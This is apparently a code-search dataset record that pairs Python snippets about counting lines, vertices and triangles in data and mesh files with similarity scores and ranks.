rellef[r] = {}\n if not r in relrig:\n relrig[r] = {}\n rellef[r][h] = 1\n relrig[r][t] = 1\n\n test.close()\n valid.close()\n triple.close()\n\n f = open(Path(output_path, \"type_constrain.txt\"), \"w\")\n f.write(\"%d\\n\" % (len(rellef)))\n for i in rellef:\n f.write(\"%s\\t%d\" % (i, len(rellef[i])))\n for j in rellef[i]:\n f.write(\"\\t%s\" % (j))\n f.write(\"\\n\")\n f.write(\"%s\\t%d\" % (i, len(relrig[i])))\n for j in relrig[i]:\n f.write(\"\\t%s\" % (j))\n f.write(\"\\n\")\n f.close()\n\n rellef = {}\n totlef = {}\n relrig = {}\n totrig = {}\n\n for i in lef:\n if not i[1] in rellef:\n rellef[i[1]] = 0\n totlef[i[1]] = 0\n rellef[i[1]] += len(lef[i])\n totlef[i[1]] += 1.0\n\n for i in rig:\n if not i[0] in relrig:\n relrig[i[0]] = 0\n totrig[i[0]] = 0\n relrig[i[0]] += len(rig[i])\n totrig[i[0]] += 1.0\n\n s11 = 0\n s1n = 0\n sn1 = 0\n snn = 0\n f = open(Path(output_path, \"test2id.txt\"), \"r\")\n ls = f.readlines()\n tot = len(ls) - 1\n # tot = (int)(f.readline())\n for i in range(tot):\n content = ls[i + 1]\n # content = f.readline()\n h, t, r = content.strip().split()\n rign = rellef[r] / totlef[r]\n lefn = relrig[r] / totrig[r]\n if rign <= 1.5 and lefn <= 1.5:\n s11 += 1\n if rign > 1.5 and lefn <= 1.5:\n s1n += 1\n if rign <= 1.5 and lefn > 1.5:\n sn1 += 1\n if rign > 1.5 and lefn > 1.5:\n snn += 1\n f.close()\n\n f = open(Path(output_path, \"test2id.txt\"), \"r\")\n f11 = open(Path(output_path, \"1-1.txt\"), \"w\")\n f1n = open(Path(output_path, \"1-n.txt\"), \"w\")\n fn1 = open(Path(output_path, \"n-1.txt\"), \"w\")\n fnn = open(Path(output_path, \"n-n.txt\"), \"w\")\n fall = open(Path(output_path,\"test2id_all.txt\"), \"w\")\n fall = open(Path(output_path,\"test2id_all.txt\"), \"w\")\n\n ls = f.readlines()\n tot = len(ls) - 1\n\n # tot = (int)(f.readline())\n fall.write(\"%d\\n\" % (tot))\n f11.write(\"%d\\n\" % (s11))\n f1n.write(\"%d\\n\" % (s1n))\n fn1.write(\"%d\\n\" % (sn1))\n fnn.write(\"%d\\n\" % (snn))\n for i in range(tot):\n content = ls[i + 1]\n # content = f.readline()\n h, t, r = content.strip().split()\n rign = rellef[r] / totlef[r]\n lefn = relrig[r] / totrig[r]\n if rign <= 1.5 and lefn <= 1.5:\n f11.write(content)\n fall.write(\"0\" + \"\\t\" + content)\n if rign > 1.5 and lefn <= 1.5:\n f1n.write(content)\n fall.write(\"1\" + \"\\t\" + content)\n if rign <= 1.5 and lefn > 1.5:\n fn1.write(content)\n fall.write(\"2\" + \"\\t\" + content)\n if rign > 1.5 and lefn > 1.5:\n fnn.write(content)\n fall.write(\"3\" + \"\\t\" + content)\n fall.close()\n f.close()\n f11.close()\n f1n.close()\n fn1.close()\n fnn.close()", "def count_positions(fname):\r\n with open(fname) as f:\r\n for i, l in enumerate(f):\r\n pass\r\n return i + 1", "def data_info(data):\n filename = data[\"filename\"]\n X_var = data[\"X_var\"]\n Y_var = data[\"Y_var\"]\n X,Y = read_file(filename,X_var,Y_var)\n input_dim = len(X_var)\n output_dim = len(Y_var)\n return X,Y,input_dim,output_dim", "def read_input(filename):\n with open(filename, 'r') as f:\n (N) = map(int, next(f).split())\n def parse_line(line):\n l = line.split()\n h = 0 if l[0] == 'H' else 1\n n = int(l[1])\n return [h, l[2:]]\n\n photos = transform_strings([parse_line(line) for line in f])\n return (len(photos), photos)", "def getNumVertexes(self):\n return _osgAnimation.RigTransformHardware_getNumVertexes(self)", "def __len__(self):\n return len(self._vertices)", "def getFileCount(self) -> int:\n ...", "def parse_triangle_files(self):\n nodes = {}\n boundary_nodes = []\n\n # parse node file into nodes\n with open(self.files['node']) as node_file:\n header = True\n for line in node_file:\n if header:\n header = False\n continue\n content = list(filter(lambda a: bool(a), line.split(' '))) # pylint: disable=W0108\n if not '#' in content[0]:\n is_boundary = content[3] == '1\\n'\n nodes[int(content[0])] = {\n 'id': int(content[0]),\n 'coords': [int(content[1]), int(content[2])],\n 'distance': 0 if is_boundary else None,\n 'relations': [],\n 'level_cycles': [], # ids of any level cycles this node is a part of\n 'level_paths': [], # ids of any level paths this node is a part of\n 'is_root_element': False,\n 'betweener_paths': []\n }\n if is_boundary:\n boundary_nodes.append(int(content[0]))\n node_file.close()\n\n # parse edge files into node relations\n with open(self.files['edge']) as edge_file:\n header = True\n for line in edge_file:\n if header:\n header = False\n continue\n content = list(filter(bool, line.split(' ')))\n if not '#' in content[0]:\n nodes[int(content[1])]['relations'].append(int(content[2]))\n nodes[int(content[2])]['relations'].append(int(content[1]))\n edge_file.close()\n\n # with open(self.files['ele']) as ele_file:\n # header = True\n # for line in edge_file:\n # if header:\n # header = False\n # continue\n # content = list(filter(bool, line.split(' ')))\n # if not '#' in content[0]:\n # nodes[int(content[1])]['relations'].append(int(content[2]))\n # nodes[int(content[2])]['relations'].append(int(content[1]))\n # edge_file.close()\n\n # sorts relations clockwise\n for node_id, node in nodes.items():\n nodes[node_id]['relations'] = sorted(node['relations'], key=(\n lambda related_node_id: (\n self.calculate_clockwise_angle_and_distance(node, nodes.get(related_node_id)) # pylint: disable=W0640\n )\n ))\n\n levels = self.get_levels(nodes, boundary_nodes)\n\n for level in levels:\n for node_id in level['node_ids']:\n self.identify_special_nodes(nodes, node_id)\n\n return nodes, boundary_nodes, levels", "def line_count(file):\n with open(file, \"r\") as f:\n return sum(1 for line in f)", "def get_num_examples(path_in):\n i = 0\n with open(path_in, 'r', encoding='utf8') as f:\n for _ in f:\n i += 1\n return i", "def read_test_tuples():\n lines = read_input(25, True)\n point_sets = list(parse_points(lines))\n expected_counts = [4, 3, 8]\n\n return zip(point_sets, expected_counts)", "def fileCount(self):\n pass", "def loadVTKPolydataFile(infile):\n\n lines = None\n\n with open(infile, 'rt') as f:\n lines = f.readlines()\n\n lines = [l.strip() for l in lines]\n\n if lines[3] != 'DATASET POLYDATA':\n raise ValueError('Only the POLYDATA data type is supported')\n\n nVertices = int(lines[4].split()[1])\n nPolygons = int(lines[5 + nVertices].split()[1])\n nIndices = int(lines[5 + nVertices].split()[2]) - nPolygons\n\n vertices = np.zeros((nVertices, 3), dtype=np.float32)\n polygonLengths = np.zeros( nPolygons, dtype=np.uint32)\n indices = np.zeros( nIndices, dtype=np.uint32)\n\n for i in range(nVertices):\n vertLine = lines[i + 5]\n vertices[i, :] = [float(w) for w in vertLine.split()]\n\n indexOffset = 0\n for i in range(nPolygons):\n\n polyLine = lines[6 + nVertices + i].split()\n polygonLengths[i] = int(polyLine[0])\n\n start = indexOffset\n end = indexOffset + polygonLengths[i]\n indices[start:end] = [int(w) for w in polyLine[1:]]\n\n indexOffset += polygonLengths[i]\n\n return vertices, polygonLengths, indices", "def readGR3File(inputFilename):\n print 'Reading ' + inputFilename + ' ...'\n infile = open(inputFilename, 'r')\n description = infile.readline().strip() # remove leading/trailing whitespace\n tmpStr = infile.readline()\n nTriangles, nNodes = (int(s) for s in tmpStr.split())\n print ' nTriangles={0:d} nNodes={1:d}'.format(nTriangles, nNodes)\n\n # nodes\n nodeArray = readNodeBlock(infile, nNodes)\n nodenum = np.array(nodeArray[:, 0].flatten(), dtype=int)\n nodexyz = np.zeros((nNodes, 3))\n nodexyz[:, :2] = nodeArray[:, 1:3]\n nodalValues = nodeArray[:, 3]\n\n print ' Nodal values min={0:g} max={1:g}'.format(min(nodalValues), max(nodalValues))\n\n # triangular elements\n triArray = readElemBlock(infile, nTriangles)\n\n trinum = triArray[:, 0].flatten()\n tritype = triArray[0, 1]\n trinodes = triArray[:, -3:] - 1 # three last columns, 0-based indexing\n #triangles = meshElements(trinodes,trinum,tritype)\n\n x = nodexyz[:, 0]\n y = nodexyz[:, 1]\n\n tmpStr = infile.readline()\n boundaries = []\n if len(tmpStr) > 0:\n # boundary information, if not end of file\n nOpenBndSegments = int(tmpStr.split()[0])\n nOpenBndNodesTot = int(infile.readline().split()[0])\n print ' nOpenBndSegments={0:d} nOpenBndNodesTot={1:d}'.format(nOpenBndSegments, nOpenBndNodesTot)\n for iBnd in range(nOpenBndSegments):\n bndHeader = infile.readline().split()\n nBndNodes = int(bndHeader[0])\n tag = bndHeader[-1]\n if tag.isdigit():\n tag = 'open' + tag\n print ' open bnd {0:d} {1:s}: {2:d} nodes'.format(iBnd + 1, tag, nBndNodes)\n tmpList = []\n for iN in range(nBndNodes):\n tmpList.append(int(infile.readline()))\n nodes = np.array(tmpList, dtype=int) - 1\n boundaries.append(meshContainer.meshBoundary('open', tag, nodes))\n nLandBndSegments = int(infile.readline().split()[0])\n nLandBndNodesTot = int(infile.readline().split()[0])\n landBndTags = range(\n nOpenBndSegments + 1,\n nOpenBndSegments + nLandBndSegments + 1)\n print ' nLandBndSegments={0:d} nLandBndNodesTot={1:d}'.format(nLandBndSegments, nLandBndNodesTot)\n for iBnd in range(nLandBndSegments):\n bndHeader = infile.readline().split()\n nBndNodes = int(bndHeader[0])\n try:\n landType = int(bndHeader[1])\n except:\n print \"\"\"Land boundary type missing in gr3 file. Add 0/1 (land/island) after number of nodes in each land boudary, e.g.\n 1002 = Total number of closed boundary nodes\n 501 0 = Number of nodes in closed boundary 1\"\"\"\n raise Exception(\n 'Could not parse land boundary type (0/1 - land/island)\\n')\n landType = 'island' if landType == 1 else 'land'\n tag = landType + bndHeader[-1]\n print ' land bnd {0:d} {1:s}: {2:d} nodes'.format(iBnd + 1, tag, nBndNodes)\n tmpList = []\n for iN in range(nBndNodes):\n tmpList.append(int(infile.readline()))\n #tmpList = fromfile(infile,dtype=int,count=nBndNodes,sep=' ')\n nodes = np.array(tmpList, dtype=int) - 1\n boundaries.append(meshContainer.meshBoundary(landType, tag, nodes))\n\n infile.close()\n\n # for better interpolation, round coordinates to 1e-4\n nDig = 4\n x = np.round(x, nDig)\n y = np.round(y, nDig)\n\n return x, y, nodalValues, trinodes, boundaries, description", "def count_data_items(fileids, train=True):\n sizes = 28000 if train else 22500\n return len(fileids) * sizes", "def linesCountingAux(file_name, nProcesses):\r\n\r\n linesPerProcessesList = []\r\n\r\n with open(file_name, \"r\") as file:\r\n lineCounting = 0\r\n\r\n for line in file:\r\n lineCounting += 1 #discover the lines in the text file\r\n\r\n linesPerProcesses = lineCounting // nProcesses\r\n\r\n for number in range(nProcesses):\r\n linesPerProcessesList.append(linesPerProcesses)\r\n if sum(linesPerProcessesList) < lineCounting:\r\n for number in range (lineCounting - sum(linesPerProcessesList)):\r\n linesPerProcessesList[number] += 1\r\n\r\n return linesPerProcessesList", "def data_edge_count(self) -> int:\n return int(self.graph_tuple_stats.data_edge_count or 0)", "def create_1d_coil_geometry(division, filename, directory):\n os.chdir(directory)\n npoints = division + 1\n length_array = np.zeros((npoints, 2))\n current_length = 0\n array = np.loadtxt(filename)\n for i in range(1, npoints):\n current_length += ((array[i, 1] - array[i - 1, 1]) ** 2 + (array[i, 2] - array[i - 1, 2]) ** 2 +\n (array[i, 3] - array[i - 1, 3]) ** 2) ** 0.5\n length_array[i - 1, 0] = i\n length_array[i, 1] = current_length\n length_array[npoints - 1, 0] = npoints\n return length_array", "def get_number_lines(running_reward_file, running_loss_file, action_count_file):\n if Path(running_reward_file).exists():\n data = np.loadtxt(running_reward_file).reshape(-1,2)\n return data.shape[0]\n if Path(running_loss_file).exists():\n data = np.loadtxt(running_loss_file).reshape(-1,2)\n return data.shape[0]\n if Path(action_count_file).exists():\n data = np.loadtxt(action_count_file).reshape(-1,2)\n return data.shape[0]\n raise NameError(\"No files to count lines\")", "def calc_side_lengths(triangles):\n first_vec = [2, 0, 1]\n second_vec = [1, 2, 0]\n sides = triangles[:, first_vec] - triangles[:, second_vec]\n lengths = np.sqrt(np.sum(sides**2, axis=2))\n return lengths", "def countLength():\n counter = 0\n\n with open('bc.processed3.csv', 'r') as openfile:\n for line in openfile:\n counter += 1\n if counter == 1:\n print line\n\n print('Length: ', counter)", "def pre_process_file(filename):\n\n num_lines = 0\n vm_ids = set()\n with open(filename) as trace:\n for item in csv.reader(trace, delimiter=','):\n num_lines += 1\n disk_id = int(item[2])\n vm_ids.add(disk_id) # can make it more efficient\n no_of_vms = len(vm_ids)\n return (num_lines, no_of_vms, vm_ids)", "def load_triangles(triangle_bytes, header):\n triangles = list()\n for i in range(header.num_tris):\n triangle = triangle_t(list(struct.unpack(\"<hhh\", triangle_bytes[12*i:12*i+6])), list(struct.unpack(\"<hhh\", triangle_bytes[12*i+6:12*i+12])))\n # print(triangle)\n triangles.append(triangle)\n return triangles", "def xFileInfo(filename):\n delim = getDelimiter(filename)\n f = open(filename, 'r')\n reader = csv.reader(f, delimiter=delim)\n num_rows = 0\n for (row_i, row) in enumerate(reader):\n if row_i == 0: #ignore empty strings (e.g. at end of row)\n num_cols = len([val for val in row if val])\n num_rows += 1\n f.close()\n return (num_rows, num_cols)", "def load_counts(filename, lengths=None, base=None):\n n = None\n if lengths is not None:\n n = lengths.sum()\n shape = (n, n)\n else:\n shape = None\n # This is the interaction count files\n dataframe = pd.read_csv(filename, sep=\"\\t\", comment=\"#\", header=None)\n row, col, data = dataframe.as_matrix().T\n\n # If there are NAs remove them\n mask = np.isnan(data)\n if np.any(mask):\n warnings.warn(\n \"NAs detected in %s. \"\n \"Removing NAs and replacing with 0.\" % filename)\n row = row[np.invert(mask)]\n col = col[np.invert(mask)]\n data = data[np.invert(mask)]\n\n # XXX We need to deal with the fact that we should not duplicate entries\n # for the diagonal.\n # XXX what if n doesn't exist?\n if base is not None:\n if base not in [0, 1]:\n raise ValueError(\"indices should start either at 0 or 1\")\n col -= base\n row -= base\n else:\n warnings.warn(\n \"Attempting to guess whether counts are 0 or 1 based\")\n\n if (col.min() >= 1 and row.min() >= 1) and \\\n ((n is None) or (col.max() == n)):\n # This is a hack to deal with the fact that sometimes, the files\n # are indexed at 1 and not 0\n\n col -= 1\n row -= 1\n\n if shape is None:\n n = max(col.max(), row.max()) + 1\n shape = (n, n)\n\n data = data.astype(float)\n counts = sparse.coo_matrix((data, (row, col)), shape=shape)\n return counts", "def get_filesize(inputfile) -> int:\n with open(inputfile, \"rb\") as f:\n lines = 0\n buf_size = 1024 * 1024\n read_f = f.raw.read\n\n buf = read_f(buf_size)\n while buf:\n lines += buf.count(b\"\\n\")\n buf = read_f(buf_size)\n\n return lines", "def get_dimensions ( file_in, separator ) :\n try :\n logger.info ( \"Extract dimensions from xyz file \" + str(file_in) ) \n d = {}\n first_row = True\n d[NOPS] = 0\n file = open(file_in, 'r')\n for line in file :\n d[NOPS] = d[NOPS] + 1\n l = line.rstrip().split(separator)\n x = float(l[0])\n y = float(l[1])\n z = float(l[2])\n if first_row :\n d[MINX] = x\n d[MAXX] = x\n d[MINY] = y\n d[MAXY] = y\n d[MINZ] = z\n d[MAXZ] = z\n first_row = False\n else :\n if x < d[MINX] :\n d[MINX] = x\n if x > d[MAXX] :\n d[MAXX] = x \n if y < d[MINY] :\n d[MINY] = y\n if y > d[MAXY] :\n d[MAXY] = y \n if z < d[MINZ] :\n d[MINZ] = z\n if z > d[MAXZ] :\n d[MAXZ] = z \n file.close() \n logger.info ('Now return')\n return d\n except Exception, err:\n logger.critical(\"Extract dimensions from xyz file failed: ERROR: %s\\n\" % str(err))\n raise", "def count_cop(self, infile):\n n_cop = 0\n dgs_in = self._file_handler.file_to_dg_list(infile)\n for dg in dgs_in:\n if dg.has_cop_deprel():\n n_cop += 1\n return n_cop, len(dgs_in)", "def listRows(file):\n\twith open(file) as f:\n\t\tcount = 0\n\t\tfor line in f.readlines():\n\t\t\tcount += 1\n\t\treturn count -1", "def getVertexNumbers(self):\n return self.vertexIndex.keys()", "def reader(filename,only_length=False):\n print(\"Counting lines in file %s\"%filename)\n total_lines=0\n for n,line in enumerate(open(filename,\"r\")):\n total_lines+=1\n \n if only_length:\n return total_lines\n \n X,Y,Z,W,J=[np.zeros(total_lines) for _ in range(5)]\n \n for n, line in enumerate(open(filename, 'r')):\n if n%1000000==0:\n print(\"Reading line %d of %d from file %s\" %(n,total_lines,filename))\n split_line=np.array(line.split(\" \"), dtype=float) \n X[n]=split_line[0];\n Y[n]=split_line[1];\n Z[n]=split_line[2];\n W[n]=split_line[3];\n J[n]=int(split_line[4]);\n return X,Y,Z,W,J", "def pfd_read (r) :\n s = r.readline()\n if s == \"\" :\n return False\n l = s.split()\n numVert = int(l[0])\n numRule = int(l[1])\n assert numVert > 0 and numVert <= 100\n assert numRule > 0 and numRule <= 100\n v = [[0,[]]] #build the Vertex array\n for i in range(1, numVert):\n temp = [0,[]]\n v.append(temp)\n s = r.readline()\n for i in range(0, numRule):\n if s == \"\":\n return False\n l = s.split()\n v[int(l[0])-1][0] = int(l[1]) #verts[l[0]].numPred = l[1]\n #verts[l[0]].preds = [0] * (len(l)-2) #I don't know whether this line is necessary\n lenl = len(l)\n for j in range(2,lenl):\n v[int(l[j])-1][1].append(int(l[0]))\n #verts[l[j]-1].succ.append(l[0]) \n s = r.readline()\n return v", "def part1(filename: str) -> int:\n data = first_line(filename)\n data = json.loads(data)\n return total_nums(data)", "def get_num_vertices(self):\n\n return self._graph_state.get_num_vertices()", "def get_dataset_size(file_path):\n size = 1\n file_list = tf.io.gfile.glob(file_path)\n for file in file_list:\n for record in tf.compat.v1.io.tf_record_iterator(file, options=tf.io.TFRecordOptions(\n compression_type='GZIP')):\n size += 1\n return size", "def from_polyfile(name):\n\n from anuga.utilities.numerical_tools import anglediff\n from math import pi\n import os.path\n root, ext = os.path.splitext(name)\n\n if ext == 'poly':\n filename = name\n else:\n filename = name + '.poly'\n\n\n fid = open(filename)\n\n points = [] #x, y\n values = [] #z\n ##vertex_values = [] #Repeated z\n triangles = [] #v0, v1, v2\n\n lines = fid.readlines()\n\n keyword = lines[0].strip()\n msg = 'First line in .poly file must contain the keyword: POINTS'\n assert keyword == 'POINTS', msg\n\n offending = 0\n i = 1\n while keyword == 'POINTS':\n line = lines[i].strip()\n i += 1\n\n if line == 'POLYS':\n keyword = line\n break\n\n fields = line.split(':')\n assert int(fields[0]) == i-1, 'Point indices not consecutive'\n\n #Split the three floats\n xyz = fields[1].split()\n\n x = float(xyz[0])\n y = float(xyz[1])\n z = float(xyz[2])\n\n points.append([x, y])\n values.append(z)\n\n\n k = i\n while keyword == 'POLYS':\n line = lines[i].strip()\n i += 1\n\n if line == 'END':\n keyword = line\n break\n\n\n fields = line.split(':')\n assert int(fields[0]) == i-k, 'Poly indices not consecutive'\n\n #Split the three indices\n vvv = fields[1].split()\n\n i0 = int(vvv[0])-1\n i1 = int(vvv[1])-1\n i2 = int(vvv[2])-1\n\n #Check for and exclude degenerate areas\n x0 = points[i0][0]\n y0 = points[i0][1]\n x1 = points[i1][0]\n y1 = points[i1][1]\n x2 = points[i2][0]\n y2 = points[i2][1]\n\n area = abs((x1*y0-x0*y1)+(x2*y1-x1*y2)+(x0*y2-x2*y0))/2\n if area > 0:\n\n #Ensure that points are arranged in counter clock-wise order\n v0 = [x1-x0, y1-y0]\n v1 = [x2-x1, y2-y1]\n v2 = [x0-x2, y0-y2]\n\n a0 = anglediff(v1, v0)\n a1 = anglediff(v2, v1)\n a2 = anglediff(v0, v2)\n\n\n if a0 < pi and a1 < pi and a2 < pi:\n #all is well\n j0 = i0\n j1 = i1\n j2 = i2\n else:\n #Swap two vertices\n j0 = i1\n j1 = i0\n j2 = i2\n\n triangles.append([j0, j1, j2])\n ##vertex_values.append([values[j0], values[j1], values[j2]])\n else:\n offending +=1\n\n log.critical('Removed %d offending triangles out of %d'\n % (offending, len(lines)))\n return points, triangles, values", "def __len__(self) -> int:\n import h5py\n\n with h5py.File(\n os.path.join(self.root, self.data_dir, self.img_file_name), \"r\"\n ) as f:\n num_datapoints: int = f[self.split][\"pv_log\"].shape[0]\n\n return num_datapoints", "def get_triangles( self, N ):\n\n # store N as an instance variable\n self.N = N\n\n # initialize array to store locations of points for all triangles in the\n # tessellation sequence\n self.triangles = np.zeros( ( self.N, 3, 2 ) )\n\n # define points of the first triangle in the tessellation sequence\n point_c = np.array( [ 0, 0 ] )\n point_b = self.a * np.array( [ np.cos( self.C ), np.sin( self.C ) ] )\n point_a = np.array( [ self.b, 0 ] )\n\n # stack the points into a single array of shape (3, 2 )\n triangle = np.vstack( [ point_c, point_b, point_a ] )\n\n # loop over the number of triangles in the sequence\n for i in range( self.N ):\n\n # store the points of the i-th triangle in the array\n self.triangles[ i ] = triangle\n\n # compute the next triangle in the tessellation sequence\n triangle = self.next_triangle( triangle = triangle )\n\n # shift the next triangle in the tessellation sequence such that its\n # point C is in the same location as point B of the previous triangle\n triangle += ( self.triangles[ i - 1, 1 ] - self.triangles[ 0, 0 ] )", "def so_data_statistics(data_file):\n with open(data_file, \"r\") as f:\n data = json.load(f)\n\n answer_to_num_questions = collections.Counter()\n comment_to_num_questions = collections.Counter()\n num_comments = 0\n num_answers = 0\n num_questions = len(data)\n\n for q in data:\n q = json.loads(q)\n q_comments = 0\n q_comments += len(q[\"comments\"])\n q_answers = len(q[\"answers\"])\n for a in q[\"answers\"]:\n q_comments += len(a[\"comments\"])\n\n answer_to_num_questions[q_answers] += 1\n comment_to_num_questions[q_comments] += 1\n\n num_comments += q_comments\n num_answers += q_answers\n\n print \"Num comments: {0}, Num answers: {1}, Num_questions: {2}\".format(\n num_comments, num_answers, num_questions)\n print \"-\" * 10\n print \"Answers map: \", answer_to_num_questions\n print \"Comments map: \", comment_to_num_questions\n\n return num_comments, num_answers, num_questions, answer_to_num_questions, \\\n comment_to_num_questions", "def numberFiles(self):\n with open(self.inputfile) as fin:\n for n, _ in enumerate(fin, start=1): pass\n self.n = n\n return self.n", "def get_vertices_num(self):\n return self.coords.shape[0]", "def strang_mesh(filename):\n\n from math import pi\n from anuga.utilities.numerical_tools import anglediff\n\n\n fid = open(filename)\n points = [] # List of x, y coordinates\n triangles = [] # List of vertex ids as listed in the file\n\n for line in fid.readlines():\n fields = line.split()\n if len(fields) == 2:\n # we are reading vertex coordinates\n points.append([float(fields[0]), float(fields[1])])\n elif len(fields) == 3:\n # we are reading triangle point id's (format ae+b)\n triangles.append([int(float(fields[0]))-1,\n int(float(fields[1]))-1,\n int(float(fields[2]))-1])\n else:\n raise Excetion('wrong format in %s' % filename)\n\n elements = [] #Final list of elements\n\n for t in triangles:\n #Get vertex coordinates\n v0 = t[0]\n v1 = t[1]\n v2 = t[2]\n\n x0 = points[v0][0]\n y0 = points[v0][1]\n x1 = points[v1][0]\n y1 = points[v1][1]\n x2 = points[v2][0]\n y2 = points[v2][1]\n\n #Check that points are arranged in counter clock-wise order\n vec0 = [x1-x0, y1-y0]\n vec1 = [x2-x1, y2-y1]\n vec2 = [x0-x2, y0-y2]\n\n a0 = anglediff(vec1, vec0)\n a1 = anglediff(vec2, vec1)\n a2 = anglediff(vec0, vec2)\n\n if a0 < pi and a1 < pi and a2 < pi:\n elements.append([v0, v1, v2])\n else:\n elements.append([v0, v2, v1])\n\n return points, elements", "def vertex_count(self):\n return len(self._outgoing)", "def n_file_elements(cls):\n \n return randint(1, (3 * Root.size))", "def contig_count(contig):\n return sum([1 for line in open(contig, 'rU').readlines() if line.startswith('>')])", "def load_lengths(filename, return_base=False):\n data = pd.read_csv(filename, sep=\"\\t\", comment=\"#\", header=None)\n data = data.as_matrix()\n _, idx, lengths = np.unique(data[:, 0], return_counts=True,\n return_index=True)\n if return_base:\n return lengths[idx.argsort()], data[0, 3]\n else:\n return lengths[idx.argsort()]", "def __init__(self, file_path):\n\n # Comments\n # mtllib mtl_name\n # o object_name\n # v x y z\n # vt u v\n # vn x y z\n # f v0/t0/n0 v1/t1/n1 v2/t2/n2\n\n print('loading mesh \"%s\"' % file_path)\n mesh_file = open(file_path, 'r')\n\n verts = []\n texs = []\n normals = []\n faces = []\n\n # For each line of the input file\n for line in mesh_file:\n line = line.rstrip(' \\r\\n')\n\n # Skip comments\n if line.startswith('#') or line == '':\n continue\n\n tokens = line.split(' ')\n tokens = map(lambda t: t.strip(' '), tokens)\n tokens = list(filter(lambda t: t != '', tokens))\n\n prefix = tokens[0]\n tokens = tokens[1:]\n\n if prefix == 'v':\n vert = list(map(lambda v: float(v), tokens))\n verts.append(vert)\n\n if prefix == 'vt':\n tc = list(map(lambda v: float(v), tokens))\n texs.append(tc)\n\n if prefix == 'vn':\n normal = list(map(lambda v: float(v), tokens))\n normals.append(normal)\n\n if prefix == 'f':\n assert len(tokens) == 3, \"only triangle faces are supported\"\n\n face = []\n for token in tokens:\n indices = list(map(lambda idx: int(idx), token.split('/')))\n face.append(indices)\n\n faces.append(face)\n\n mesh_file.close()\n\n self.num_faces = len(faces)\n\n print('num verts=%d' % len(verts))\n print('num_faces=%d' % self.num_faces)\n\n # Create numpy arrays to store the vertex data\n list_verts = np.zeros(shape=(3 * self.num_faces, 3), dtype=np.float32)\n list_texcs = np.zeros(shape=3 * 2 * self.num_faces, dtype=np.float32)\n list_norms = np.zeros(shape=3 * 3 * self.num_faces, dtype=np.float32)\n\n cur_vert_idx = 0\n\n # For each triangle\n for face in faces:\n # For each triplet of indices\n for triplet in face:\n v_idx, t_idx, n_idx = triplet\n\n # Note: OBJ uses 1-based indexing\n vert = verts[v_idx-1]\n texc = texs[t_idx-1]\n normal = normals[n_idx-1]\n\n list_verts[cur_vert_idx, :] = vert\n list_texcs[2*cur_vert_idx:2*(cur_vert_idx+1)] = texc\n list_norms[3*cur_vert_idx:3*cur_vert_idx+3] = normal\n\n cur_vert_idx += 1\n\n # Re-center the object so that y=0 is at the base,\n # and the object is centered in x and z\n x_coords = list_verts[:, 0]\n z_coords = list_verts[:, 2]\n min_y = list_verts[:, 1].min()\n mean_x = (x_coords.min() + x_coords.max()) / 2\n mean_z = (z_coords.min() + z_coords.max()) / 2\n list_verts[:, 1] -= min_y\n list_verts[:, 0] -= mean_x\n list_verts[:, 2] -= mean_z\n\n # Compute the object extents after centering\n x_coords = list_verts[:, 0]\n y_coords = list_verts[:, 1]\n z_coords = list_verts[:, 2]\n self.y_max = y_coords.max()\n\n # Create a vertex list to be used for rendering\n self.vlist = pyglet.graphics.vertex_list(\n 3 * self.num_faces,\n ('v3f', list_verts.reshape(-1)),\n ('t2f', list_texcs),\n ('n3f', list_norms)\n )\n\n # Load the texture associated with this mesh\n file_name = os.path.split(file_path)[-1]\n tex_name = file_name.split('.')[0]\n tex_path = get_file_path('textures', tex_name, 'png')\n self.texture = load_texture(tex_path)", "def count_elements(path):\n count = 0\n with open(path, 'r') as f:\n groups = f.read().split('\\n\\n')\n for idx in range(len(groups)):\n word = groups[idx].split('\\n')\n no_of_ele = len(word)\n for i in range(no_of_ele-1):\n word[0] = word[0]+word[i+1]\n count += len(''.join(set(word[0])))\n return count" ]
[ "0.7772032", "0.68836695", "0.6398507", "0.6369426", "0.6362666", "0.6353974", "0.6323438", "0.6275137", "0.6170703", "0.6165812", "0.6144632", "0.613628", "0.61066425", "0.6011404", "0.59843576", "0.59520715", "0.5947087", "0.594126", "0.5935394", "0.59270984", "0.59270984", "0.5926359", "0.58514494", "0.58492893", "0.5836909", "0.5831675", "0.5831274", "0.5829534", "0.5826601", "0.5811575", "0.5778336", "0.57675093", "0.57538956", "0.5736303", "0.57076925", "0.56999564", "0.5698479", "0.5696968", "0.5686956", "0.56687146", "0.56588656", "0.5653763", "0.56502515", "0.56390417", "0.56024665", "0.55870193", "0.55844635", "0.5567423", "0.55649316", "0.55533016", "0.55512464", "0.5543442", "0.5538092", "0.5535526", "0.5528358", "0.55240124", "0.55178404", "0.5515604", "0.5512616", "0.55055326", "0.5478094", "0.5473247", "0.5468789", "0.54656523", "0.5454213", "0.5453736", "0.5441365", "0.5434383", "0.54289347", "0.5426822", "0.54233533", "0.5419709", "0.541386", "0.5409464", "0.54024774", "0.54002786", "0.53972715", "0.5392659", "0.5391981", "0.53919524", "0.53839743", "0.53838426", "0.538381", "0.5370671", "0.5369772", "0.5365828", "0.5359394", "0.53585804", "0.5356658", "0.5348002", "0.5342111", "0.53373665", "0.53328633", "0.5328268", "0.53233385", "0.5323326", "0.53231263", "0.5319525", "0.5303401", "0.5298637" ]
0.64086694
2
This function will return data about the number of triangles on each surface in a file inputs
def get_triangles_per_surface(my_core, entity_ranges): t_p_s = {} for surface in entity_ranges['Surfaces']: t_p_s[surface] = my_core.get_entities_by_type( surface, types.MBTRI).size() return t_p_s
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def count_triangles(self, file):\n self.nibble(80)\n return struct.unpack(\"@i\", self.nibble(4))[0]", "def get_num_vertices(triangles):\n return numpy.amax(numpy.reshape(triangles, -1)) + 1", "def count_cells(fpath):\n cells = []\n for i in range(40):\n fname = f\"{fpath}/Mesh2d_{i}.vtu\"\n if not os.path.exists(fname):\n print(f\"File {fname} does not exist.\")\n break\n mesh = meshio.read(fname)\n for cell_block in mesh.cells:\n if cell_block.type in (\"triangle\"):\n num_cells = len(cell_block)\n print(f\"{i:2d}: {num_cells:6d} elements, {len(mesh.points):6d} vertices\")\n cells.append(num_cells)\n continue\n return cells", "def num_data_lines(filepath):\n\tif not file_exists(filepath):\n\t\treturn -1\n\tcount = 0\n\twith open(filepath, 'r') as f:\n\t\twhile read_floats(f):\n\t\t\tcount += 1\n\tf.close()\n\treturn count", "def countSamples(filename):\n with open(filename, \"r\") as f:\n line = f.readline().split(\"\\t\")\n return len(line) - 2", "def _get_las_npoints(fpath):\n with laspy.file.File(fpath) as f:\n return f.header.count", "def get_triangles_per_vertex(my_core, native_ranges):\n\n 